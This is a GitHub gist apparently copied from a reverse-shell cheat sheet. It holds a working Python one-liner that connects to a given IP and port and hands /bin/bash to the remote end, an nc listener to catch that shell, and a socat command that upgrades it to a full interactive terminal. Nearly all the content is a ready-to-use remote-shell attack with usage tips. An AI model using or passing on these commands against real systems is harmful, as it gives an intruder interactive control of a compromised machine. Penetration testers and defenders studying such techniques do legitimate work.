-
-
Save castanley/ecc324017c04dda9ca1b to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | |
| # on the CLIENT, run the following: | |
| # nc -l 12345 | |
| # on the SERVER, start the "reverse shell" | |
| python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')" 192.168.2.176 12345 | |
| # now go to the CLIENT, listen on port 12345 for incoming shell connections | |
| nc -l 12345 | |
| # that worked, but note that 'nc' does a terrible job emulating a tty | |
| # (arrows keys aren't sent correctly, don't even try launching vim) | |
| # instead, let's install socat, a smarter netcat, via "sudo apt-get install socat" or "brew install socat" | |
| # launch socat, asking it to to talk forward all traffic on 12345 to /dev/ttys003 (raw,echo=0 fix tty issues) | |
| socat `tty`,raw,echo=0 tcp-listen:12345 | |
| # enjoy |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment